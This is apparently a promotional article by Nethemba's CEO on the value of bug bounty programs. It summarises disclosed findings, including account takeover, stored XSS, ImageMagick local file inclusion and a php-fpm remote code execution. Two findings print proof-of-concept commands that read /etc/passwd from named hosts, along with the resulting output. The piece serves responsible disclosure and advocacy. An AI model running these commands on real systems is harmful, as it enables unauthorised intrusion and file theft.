CEO of Nethemba - Slovak IT security company founded in 2007, primarily focused on web application security and various penetration tests.
How Hacktrophy helped our customers to reveal critical vulnerabilities
The main advantage of bug bounty programs over traditional penetration tests and security audits:
- Penetration tests are one-time security evaluations of the system or application to a specific date (unfortunately, only a few customers do regular penetration testing)
- Ethical hackers in bug bounty programs are looking for security vulnerabilities regularly - in case of any new public vulnerability, they automatically rescan all applications registered in the bounty programs to check if they are affected by the given vulnerability.
- They have the maximum incentive to reveal the given vulnerability as the first ones to receive bounty
Two successful hacks of customer applications
Disclaimer: The customer explicitly agreed with publishing their findings
1. Account Takeover (IDOR)
Direct object reference with significant impact
2. Stored XSS in https://parentalcontrol.eset.com
Remove button in the "Rules -> Exception" section.
app.hacktrophy.com hack using LFI (local file inclusion) via vulnerable ImageMagick library
hacktrophy is vulnerable to local file inclusion (LFI), due to an outdated version of ImageMagick being used (CVE-2022-44268). Proof-of-Concept: Log into app.hacktrophy.com and upload the attached `poc.png` as profile image (via "Account Settings"). Then open the "Application" tab in Chrome's "Developer Tools" and download the resulting image (see attached `screenshot.png`). Finally, run... $ identify -verbose 658-jsbounty-thumb_poc.png | grep -A9999 "Raw profile type" | tail -n +4 | grep -v ":" | xxd -r -ps root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync
Hack of cloud.nethemba.com via RCE via php-fpm
Remote Code Execution in https://cloud.nethemba.com via CVE-2019-11043: PoC wget "https://cloud.nethemba.com/index.php?a=/bin/cat%20/etc/passwd" -qO-
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
The hackers could spot the given vulnerabilities immediately (there is a direct incentive to be the first one), often before official security patches were released.
Thanks to the Hacktrophy Bug bounty program, you are informed about vulnerabilities IMMEDIATELY - no need to wait for black hat hackers to exploit them with severe and unexpected consequences.
One thousand white hat hackers are usually faster than one black hat hacker.
By Pavol Luptak